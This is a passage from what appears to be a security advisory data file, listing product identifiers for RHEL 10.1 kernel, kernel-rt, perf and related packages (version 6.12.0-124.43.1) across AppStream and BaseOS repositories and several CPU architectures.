"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
